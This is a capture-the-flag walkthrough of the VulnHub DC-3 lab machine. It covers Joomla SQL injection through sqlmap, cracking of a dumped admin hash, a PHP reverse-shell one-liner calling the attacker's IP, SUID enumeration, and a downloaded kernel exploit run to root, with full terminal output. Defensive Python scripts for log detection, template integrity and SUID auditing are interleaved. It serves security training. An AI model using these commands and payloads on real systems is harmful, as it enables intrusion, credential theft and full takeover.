Download: https://www.vulnhub.com/entry/dc-3,312/
Host discovery
Port scan: only port 80 is open. With the -A option (nmap's aggressive scan) the output also shows that the site's CMS is Joomla.
Visit port 80
Directory scan: the site's admin back end is found
Using nikto: nikto -host 192.168.44.144
Using dirsearch
python3 dirsearch.py -u http://192.168.44.144 -e php
Using joomscan, a Joomla-specific vulnerability scanner, to find the exact Joomla version
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl 192.168.44.144
Use searchsploit to look up known vulnerabilities for Joomla 3.7.0
searchsploit joomla 3.7.0
Read the entry
Following the path it gives, read that file: this CMS version has a SQL injection vulnerability, CVE-2017-8917
Open sqlmap and start the injection
Dump the databases
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"
Dump the tables
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables
Dump the columns
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users --columns
Dump the contents
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users -C "name,password" --dump
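The four sqlmap runs above all ride on the same request shape: option=com_fields with a list[fullordering] value that is not a sort key. The following is an added detection example for the defending side, not code from the original walkthrough: it parses Apache-style access-log lines and reports com_fields requests whose list[fullordering] is anything other than "column ASC|DESC" or names a MySQL function. The log lines, IPs and timestamps are constructed for the demo; the first one is the exact probe the sqlmap command line above sends, the second is the same probe URL-encoded with arguments.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access-log lines (not taken from the DC-3 machine).
# Lines 1 and 2 carry the CVE-2017-8917 request shape; line 3 is unrelated;
# line 4 is a legitimate sort request, which is what list[fullordering] is for.
SAMPLE_LOG = """\
192.168.44.142 - - [09/Apr/2020:23:10:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 1043 "-" "Mozilla/5.0"
192.168.44.142 - - [09/Apr/2020:23:10:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%281%2C1%2C1%29 HTTP/1.1" 500 1043 "-" "sqlmap/1.4"
192.168.44.150 - - [09/Apr/2020:23:11:15 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.44.150 - - [09/Apr/2020:23:11:20 +0000] "GET /administrator/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Common Log Format prefix: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Joomla expects fullordering to be "<column> ASC|DESC"; anything else is not a sort key.
SAFE_ORDERING = re.compile(r'^[a-z0-9_.]+(\s+(asc|desc))?$', re.IGNORECASE)

# MySQL functions that have no business in a sort expression, even as a bare word.
SQL_FUNCS = re.compile(r'\b(updatexml|extractvalue|sleep|benchmark|concat|load_file)\b', re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_fullordering(target):
    """Return the decoded list[fullordering] value when a com_fields request carries
    something other than a plain sort expression, else None."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get('option') != ['com_fields']:
        return None
    for value in params.get('list[fullordering]', []):
        value = unquote(value).strip()   # second decode catches double-encoded payloads
        if SQL_FUNCS.search(value) or not SAFE_ORDERING.match(value):
            return value
    return None


def find_injection_attempts(log_text):
    """Scan a block of log text and return one record per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        payload = suspicious_fullordering(rec['target'])
        if payload is not None:
            hits.append({'ip': rec['ip'], 'ts': rec['ts'],
                         'status': rec['status'], 'payload': payload})
    return hits


if __name__ == '__main__':
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['ts']} HTTP {hit['status']}: {hit['payload']}")
```

The allow-list on the value is the part that matters: a signature for "updatexml" alone misses the next tool, while "anything that is not column-plus-direction" catches every variant of this bug regardless of which MySQL function is used. A burst of HTTP 500s from one client on this endpoint is the other cheap indicator.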
Username: admin
Password: $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
Cracking the hash with John on Kali gives the back-end login password: snoopy
Log in to the admin back end found earlier: http://192.168.44.144/administrator/
Poking around the back end, I found the place where the site templates can be edited; a new PHP file can be created there and used directly as a reverse shell.
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.44.142/8080 0>&1'");?>
Listen on Kali: nc -lvvp 8080
Then request the reverse-shell file from the browser. Working out its path took a while:
it sits under the templates directory found in the earlier directory scan, in the folder named after the template (beez3), and the Linux filesystem is case-sensitive,
so it took some time to find the right path and request it.
At this point Kali has received the shell.
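The template editor gives anyone with an admin session a way to write PHP that the web server will execute, which is why the file under templates/ is worth watching. As an added example (not code from the original walkthrough), the script below builds a SHA-256 manifest of a template directory and reports every PHP file added or modified since the baseline. The directory contents and the beez3 name are constructed inside a temporary directory for the demo; in practice the check runs against the site's templates directory with the baseline stored off the box.

```python
import hashlib
import tempfile
from pathlib import Path


def build_manifest(root):
    """Map each regular file under root (path relative to root) to its SHA-256."""
    root = Path(root)
    manifest = {}
    for p in sorted(root.rglob('*')):
        if p.is_file():
            manifest[str(p.relative_to(root))] = hashlib.sha256(p.read_bytes()).hexdigest()
    return manifest


def diff_manifest(baseline, current):
    """Classify every path as added, removed or modified relative to the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {'added': added, 'removed': removed, 'modified': modified}


def suspicious_changes(diff):
    """Added or modified PHP files are the ones that need an immediate look:
    the admin-panel template editor can create them and the web server runs them."""
    return sorted(p for p in diff['added'] + diff['modified']
                  if p.lower().endswith(('.php', '.phtml')))


def demo():
    """Build a constructed template tree, take a baseline, simulate an edit, and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        tpl = Path(tmp) / 'templates' / 'beez3'   # constructed stand-in, not the real template
        (tpl / 'html').mkdir(parents=True)
        (tpl / 'index.php').write_text('<?php // template entry point ?>')
        (tpl / 'html' / 'pagination.php').write_text('<?php // layout override ?>')
        (tpl / 'template.css').write_text('body{}')
        baseline = build_manifest(tpl)

        # What the walkthrough does through the template editor: one new file, one edited file.
        (tpl / 'shell.php').write_text('<?php /* constructed placeholder, no payload */ ?>')
        (tpl / 'index.php').write_text('<?php // template entry point, edited ?>')

        diff = diff_manifest(baseline, build_manifest(tpl))
        return diff, suspicious_changes(diff)


if __name__ == '__main__':
    diff, flagged = demo()
    print('added:', diff['added'])
    print('modified:', diff['modified'])
    print('needs review:', flagged)
```

A template directory changes only on upgrades, so an empty diff is the normal result; a cron job that re-runs this and mails the flagged list turns the technique above into a same-day alert rather than a post-incident discovery.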
Privileges are low, so first try SUID privilege escalation. Any of the following commands lists the SUID executables on the system:
- find / -perm -u=s -type f 2>/dev/null
- find / -user root -perm -4000 -print 2>/dev/null
- find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Linux binaries known to be usable for privilege escalation when SUID: nmap, vim, find, bash, more, less, nano, cp
No exploitable file was found.
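The same listing is what a defender audits. Below is an added example (not from the original page) that parses long-format ls output, as the last find command above prints it, and flags root-owned SUID binaries that are either outside an expected baseline or on the escalation-capable list above. The sample listing and the EXPECTED_SUID baseline are constructed for the demo; the real baseline should come from a clean image of the same distribution.

```python
import re

# Binaries the walkthrough lists as usable for privilege escalation when they are SUID.
ESCALATION_CAPABLE = {'nmap', 'vim', 'find', 'bash', 'more', 'less', 'nano', 'cp'}

# Constructed baseline of SUID names one expects on a stock Debian/Ubuntu install
# (an assumption for the demo; derive the real one from a clean image).
EXPECTED_SUID = {'passwd', 'su', 'sudo', 'mount', 'umount', 'ping', 'ping6',
                 'chsh', 'chfn', 'gpasswd', 'newgrp', 'pkexec'}

# Constructed `ls -ldb` output, shaped like what `find / -user root -perm -4000 -exec ls -ldb {} \;` prints.
SAMPLE_LS = """\
-rwsr-xr-x 1 root root 54256 Mar 26 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40128 Mar 26 2019 /bin/su
-rwsr-xr-x 1 root root 238080 Feb 18 2016 /usr/bin/find
-rwxr-xr-x 1 root root 126584 Feb 18 2016 /bin/ls
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 15928 Mar 1 10:12 /usr/local/bin/backup-helper
"""

# mode, link count, owner, group, size, three date tokens, path
LS_RE = re.compile(
    r'^(?P<mode>[-bcdlps][-rwxsStT]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+'
    r'\S+\s+\S+\s+\S+\s+(?P<path>.+)$'
)


def parse_ls_line(line):
    """Parse one long-format ls line into mode, owner, group, path; None if it does not parse."""
    m = LS_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # The fourth mode character is the owner-execute slot: 's' or 'S' means setuid is set.
    rec['setuid'] = rec['mode'][3] in 'sS'
    return rec


def audit_suid(lines):
    """Return every root-owned setuid file, tagged with why it deserves attention."""
    findings = []
    for line in lines:
        rec = parse_ls_line(line)
        if rec is None or not rec['setuid'] or rec['owner'] != 'root':
            continue
        name = rec['path'].rsplit('/', 1)[-1]
        findings.append({
            'path': rec['path'],
            'unexpected': name not in EXPECTED_SUID,
            'escalation_capable': name in ESCALATION_CAPABLE,
        })
    return findings


if __name__ == '__main__':
    for f in audit_suid(SAMPLE_LS.splitlines()):
        tags = [t for t in ('unexpected', 'escalation_capable') if f[t]]
        print(f"{f['path']}: {', '.join(tags) or 'expected'}")
```

Two findings come out of the constructed sample: /usr/bin/find (SUID on a program that can run arbitrary commands, which is the case the walkthrough is probing for) and /usr/local/bin/backup-helper (not escalation-capable by name, but no stock install ships it SUID). The fix for either is chmod u-s, and diffing this output against the baseline on a schedule catches the SUID helper that the kernel exploit later in this page drops.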
Try kernel privilege escalation
Check the Linux version
Use searchsploit to search for an exploitable vulnerability
Following the path given, view the exploit details: cat /usr/share/exploitdb/exploits/linux/local/39772.txt
It gives the exploit download address: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Find a directory with execute permission
Change into the tmp folder and download the exploit that searchsploit pointed to
Change directory: cd tmp
Download: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Unzip: unzip 39772.zip
Extract again: tar -xvf exploit.tar
Change directory: cd ebpf_mapfd_doubleput_exploit/
Run: ./compile.sh
./doubleput
And that gives root.
www-data@DC3VM:/var/www/html$ cd tmp
cd tmp
www-data@DC3VM:/var/www/html/tmp$ ls
ls
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2020-04-09 23:27:16-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 13.250.177.223
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2020-04-09 23:27:17-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'
0K ...... 100% 4.44M=0.002s
2020-04-09 23:27:18 (4.44 MB/s) - '39772.zip' saved [7025/7025]
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772.zip
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ unzip 39772.zip
unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772
39772.zip
__MACOSX
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ cd 3977
cd 39772
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
ebpf_mapfd_doubleput_exploit
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ cd ebpf
cd ebpf_mapfd_doubleput_exploit/
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput.c
hello.c
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doub
./doub
bash: ./doub: No such file or directory
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
bash -i
bash: cannot set terminal process group (1315): Inappropriate ioctl for device
bash: no job control in this shell
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# exit
bash: [2708: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$